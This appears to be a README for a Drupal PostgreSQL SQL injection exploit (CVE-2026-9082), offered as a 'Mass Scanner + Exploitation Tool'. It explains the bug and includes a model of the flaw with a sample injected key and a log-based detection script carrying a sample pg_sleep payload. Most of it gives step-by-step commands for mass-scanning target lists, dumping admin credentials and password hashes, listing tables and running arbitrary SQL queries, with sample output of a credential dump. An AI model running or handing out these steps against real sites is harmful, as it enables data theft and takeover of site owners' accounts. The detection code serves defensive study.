Unauthenticated SQL Injection in Drupal Core (PostgreSQL)
JSON:API filter array key injection via PDO placeholder name abuse
CVE-2026-9082 is a Highly Critical SQL injection vulnerability in Drupal Core affecting all PostgreSQL-backed sites running Drupal 8.0 through 11.3.9. Added to the CISA Known Exploited Vulnerabilities (KEV) catalog on 2026-05-22 — actively exploited in the wild.
| Severity | CVSS | Auth Required | Attack Vector |
|---|---|---|---|
| Critical | 9.8+ | None | HTTP (JSON:API) |
- Data exfiltration — extract databases, users, password hashes
- Privilege escalation — create admin accounts, modify content
- Remote code execution — in some configurations via `pg_exec()` or `COPY ... PROGRAM` (the latter only when the site's database role is a superuser or a member of `pg_execute_server_program`, so a least-privilege database user limits the impact to data access)
| Status | Versions |
|---|---|
| ❌ Vulnerable | Drupal 8.0.0 → 11.3.9 (PostgreSQL backend) |
| ✅ Fixed | 11.3.10, 11.2.12, 10.6.9, 10.5.10 |
The flaw is in core/modules/pgsql/src/EntityQuery/Condition.php. The translateCondition() method builds PDO placeholder names from user-controlled array keys in JSON:API filter parameters. PDO only recognises the characters [a-zA-Z0-9_] as part of a named placeholder, so a key is split at its first other character: the identifier prefix is bound as a parameter, and everything from that character onward (for example a closing parenthesis followed by attacker-chosen SQL) is left in the query as literal SQL.
JSON:API Filter → array key with SQL → PDO placeholder truncation → SQL injection
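To make that chain concrete, here is an added Python model of the placeholder scan. It is example code written for this page, not Drupal's Condition.php and not the scanner's own code. The `node_field_data` table, the `title` field, the `build_in_condition_*` helpers and the sample filter keys are assumptions chosen for illustration; the only fact taken from the page is that PDO treats `:` followed by `[A-Za-z0-9_]+` as a placeholder name and passes everything else through verbatim (emulated here as a rewrite to positional `$n` markers).

```python
import re

# PDO's statement scanner treats ':' followed by one or more [A-Za-z0-9_]
# characters as a named placeholder and copies every other character through
# to the statement text unchanged. (Simplified: the real scanner also skips
# quoted literals and comments, which this model does not need.)
PLACEHOLDER_RE = re.compile(r":([A-Za-z0-9_]+)")

TABLE = "node_field_data"  # assumed table name, for illustration only


def pdo_rewrite(sql):
    """Emulate the placeholder scan: return the statement as the database
    would receive it (named placeholders rewritten to positional $n markers)
    and the list of placeholder names PDO actually recognised."""
    names = []

    def repl(match):
        names.append(match.group(1))
        return f"${len(names)}"

    return PLACEHOLDER_RE.sub(repl, sql), names


def build_in_condition_vulnerable(field, values_by_key):
    """Model of the flawed pattern: placeholder names are derived from the
    caller-supplied array keys (the JSON:API filter keys). Hypothetical
    helper, not Drupal's translateCondition()."""
    placeholders = [f":{field}_{key}" for key in values_by_key]
    return f"SELECT nid FROM {TABLE} WHERE {field} IN ({', '.join(placeholders)})"


def build_in_condition_fixed(field, values_by_key):
    """Hardened form: placeholder names come from an internal counter, so no
    attacker-controlled byte ever reaches the statement text. The values are
    still bound as parameters; only the names changed."""
    placeholders = [f":{field}_{i}" for i in range(len(values_by_key))]
    return f"SELECT nid FROM {TABLE} WHERE {field} IN ({', '.join(placeholders)})"


def demo():
    # Constructed input: the second filter key carries SQL after its
    # identifier part, exactly the shape the vulnerability needs.
    filters = {"0": "Hello", "1) OR 1=1 --": "x"}

    # Vulnerable: PDO binds :title_0 and :title_1, then passes ") OR 1=1 --)"
    # through verbatim, so the WHERE clause is attacker-controlled.
    sql_bad, names_bad = pdo_rewrite(build_in_condition_vulnerable("title", filters))

    # Fixed: the same hostile keys produce a statement with nothing but
    # positional markers inside the IN (...) list.
    sql_good, names_good = pdo_rewrite(build_in_condition_fixed("title", filters))
    return sql_bad, names_bad, sql_good, names_good


if __name__ == "__main__":
    for label, sql in zip(("vulnerable", "fixed"), demo()[::2]):
        print(f"{label:10s} -> {sql}")
```

Running it prints both statements. The vulnerable one ends in `OR 1=1 --)`, the stray closing parenthesis being neutralised by the comment marker; the rewritten text is what a native prepared statement sends to the server, so the injected clause is parsed as SQL before any value is bound. The fix needs no escaping at all: as long as placeholder names are generated internally, the filter keys can contain anything without touching the statement text.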
- ✅ Mass scanner — scan hundreds of targets concurrently
- ✅ Single target mode — check individual Drupal sites
- ✅ Time-based detection — `pg_sleep()` blind SQLi confirmation
- ✅ Boolean-based detection — row count comparison
- ✅ Version extraction — identify PostgreSQL version
- ✅ Database info — extract current user and database name
- ✅ Admin credential dump — username, email, password hash (uid=1)
- ✅ Table listing — enumerate all public tables
- ✅ Custom SQL queries — run any extraction query
- ✅ Proxy support — route through Burp Suite or similar
- ✅ Output to file — save mass scan results
- ✅ Colored terminal output — easy to read results
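Every detection and extraction method above delivers its payload inside a JSON:API filter key, so exploitation attempts leave a distinctive trace in the web server access log. The following Python is an added example written for this page (it is not part of the scanner): it parses combined-format log lines and flags `/jsonapi/` requests whose `filter[...]` keys contain characters a legitimate key never needs. The three log lines are constructed, the client addresses are documentation ranges, and the "safe key" character set `[A-Za-z0-9_.-]` is an assumption to tune against a site's real traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache/nginx combined log format (not real traffic).
# The second line carries SQL inside the first filter key, the shape the
# vulnerability requires; the other two are ordinary JSON:API requests.
SAMPLE_LOG = """\
203.0.113.5 - - [23/May/2026:10:01:02 +0000] "GET /jsonapi/node/article?filter%5Btitle%5D%5Bvalue%5D=hello HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [23/May/2026:10:01:07 +0000] "GET /jsonapi/node/article?filter%5Bx%29%20OR%20pg_sleep%285%29--%5D%5Bvalue%5D=1 HTTP/1.1" 200 412 "-" "python-requests/2.31"
198.51.100.2 - - [23/May/2026:10:02:11 +0000] "GET /jsonapi/node/article?filter%5Bstatus%5D=1&page%5Blimit%5D=10 HTTP/1.1" 200 8800 "-" "curl/8.5.0"
"""

# Combined log format: client, identd, user, [timestamp], "METHOD target protocol"
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')
# A filter parameter is "filter" followed by one or more [key] segments (decoded form).
FILTER_PARAM_RE = re.compile(r"(?:^|&)filter((?:\[[^\]]*\])+)")
KEY_RE = re.compile(r"\[([^\]]*)\]")
# Assumption: legitimate JSON:API filter keys are identifiers, labels and field
# paths. Quotes, parentheses, spaces and comment markers are what the injection
# needs and never appear in a benign key, so any other character is flagged.
SAFE_KEY_RE = re.compile(r"^[A-Za-z0-9_.\-]*$")


def suspicious_filter_keys(target):
    """Return the filter keys in a request target that are not plain identifiers."""
    if "?" not in target:
        return []
    # Decode first: attackers percent-encode the payload, and the server
    # decodes it before the keys reach Drupal.
    query = unquote_plus(target.split("?", 1)[1])
    bad = []
    for param in FILTER_PARAM_RE.finditer(query):
        for key in KEY_RE.findall(param.group(1)):
            if not SAFE_KEY_RE.match(key):
                bad.append(key)
    return bad


def scan_log(text):
    """Return one finding per JSON:API request whose filter keys look injected."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or not m["target"].startswith("/jsonapi/"):
            continue
        keys = suspicious_filter_keys(m["target"])
        if keys:
            findings.append({"ip": m["ip"], "time": m["ts"], "keys": keys})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} suspicious filter key(s): {f['keys']}")
```

Two caveats when running this against real logs: nginx and Apache escape some bytes in the logged request line (for example `"` as `\x22`), so decode those escapes before the percent-decoding if your log format uses them, and a payload that was double-encoded will only be caught if you decode it the same number of times the application does. Matching on the key character set rather than on `pg_sleep` also catches the boolean-based probes, which carry no sleep call at all.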
- Python 3.8+
- pip (Python package manager)
```bash
# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082

# Install requirements
pip install requests
```

That's it! Only one dependency: requests.
Check a single target:

```bash
python3 cve_2026_9082_scanner.py -u https://target.com --check
```

Scan a list of targets:

```bash
python3 cve_2026_9082_scanner.py -f targets.txt
```

targets.txt format (one target per line, with or without a scheme):

```
https://target1.com
target2.com
192.168.1.100
```
Extract the PostgreSQL version:

```bash
python3 cve_2026_9082_scanner.py -u https://target.com --version
```

Extract the current database user and database name:

```bash
python3 cve_2026_9082_scanner.py -u https://target.com --dbinfo
```

Dump the admin credentials (uid=1):

```bash
python3 cve_2026_9082_scanner.py -u https://target.com --admin
```

List all public tables:

```bash
python3 cve_2026_9082_scanner.py -u https://target.com --tables
```

Run a custom extraction query:

```bash
python3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"
```

Save mass scan results to a file:

```bash
python3 cve_2026_9082_scanner.py -f targets.txt -o results.txt
```

Route requests through a proxy (e.g. Burp Suite):

```bash
python3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080
```

Tune timing. On slow or jittery targets raise `--delay` so the `pg_sleep()` difference stands out from normal latency variance, otherwise a time-based check may be inconclusive:

```bash
# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10

# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60
```

| Flag | Description |
|---|---|
| `-u, --url` | Single target URL |
| `-f, --file` | File with targets (one per line) |
| `-o, --output` | Save scan results to file |
| `--check` | Check if target is vulnerable |
| `--version` | Extract PostgreSQL version |
| `--dbinfo` | Extract DB user and database name |
| `--admin` | Extract Drupal admin credentials (uid=1) |
| `--tables` | List all database tables |
| `--query` | Custom SQL extraction query |
| `--threads` | Threads for mass scan (default: 20) |
| `--timeout` | HTTP request timeout (default: 30s) |
| `--delay` | pg_sleep delay for detection (default: 5s) |
| `--no-ssl-verify` | Skip TLS certificate verification |
| `--proxy` | HTTP proxy (e.g., http://127.0.0.1:8080) |
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-9082 - Drupal PostgreSQL SQLi ║
║ Mass Scanner + Exploitation Tool v1.0.0 ║
╚══════════════════════════════════════════════════════════════╝
CISA KEV: Added 2026-05-22 | Advisory: SA-CORE-2026-004
[*] Checking: https://vulnerable-drupal-site.com
[!!] VULNERABLE - https://vulnerable-drupal-site.com
Method: time-based (+5.2s)
Resource: node/article
[+] username: admin
[+] email: admin@example.com
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...
| Source | Link |
|---|---|
| Drupal Advisory | SA-CORE-2026-004 |
| CISA KEV | CVE-2026-9082 |
| Patch Commit | ea9524d9 |
| NVD Entry | CVE-2026-9082 |
| Discoverer | Michael Maturi |
This tool is for authorized security testing, educational purposes, and ethical research only.
Unauthorized access to computer systems is illegal. The authors assume no liability and are not responsible for any misuse or damage caused by this program.
Ridhin V A (@ridhinva) — Bug bounty hunter & security researcher
Built because CISA KEV said it's being exploited in the wild. Patch your Drupal sites.